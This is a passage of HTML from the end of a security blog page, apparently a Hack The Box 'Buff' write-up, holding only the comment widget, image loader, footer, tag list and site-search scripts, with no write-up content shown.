href="https://disqus.com/">Disqus</a>.</p></div><script src="/assets/js/lib/jquery.disqusloader.min.js"></script> <script> var options = { scriptUrl: '//bigb0ss-blog.disqus.com/embed.js', disqusConfig: function() { this.page.url = 'https://bigb0sss.github.io/posts/htb-buff-writeup/'; this.page.identifier = '/posts/htb-buff-writeup/'; } }; $.disqusLoader('#disqus', options); </script></div></div></div><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script> <script type="text/javascript"> const imgs = document.querySelectorAll('#post-wrapper img'); const observer = lozad(imgs); observer.observe(); </script><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2020 <a href="https://www.linkedin.com/in/danielsmin">bigb0ss</a>. <span data-toggle="tooltip" data-placement="top" title="CC BY 4.0 ">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy/">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-xl-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/tags/x86/">x86</a> <a class="post-tag" href="/tags/slae32/">slae32</a> <a class="post-tag" href="/tags/assembly/">assembly</a> <a class="post-tag" href="/tags/redteam/">redteam</a> <a class="post-tag" href="/tags/cloud/">cloud</a> <a class="post-tag" href="/tags/zip2john/">zip2john</a> <a class="post-tag" href="/tags/web.config-rce/">web.config rce</a> <a class="post-tag" href="/tags/vhost/">vhost</a> <a class="post-tag" href="/tags/valentine/">valentine</a> <a class="post-tag" href="/tags/tomcat/">tomcat</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="https://bigb0sss.github.io{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"><div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div><div><i class="fa fa-tag fa-fw"></i>{tags}</div></div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">[-] No result found</p>' }); </script>
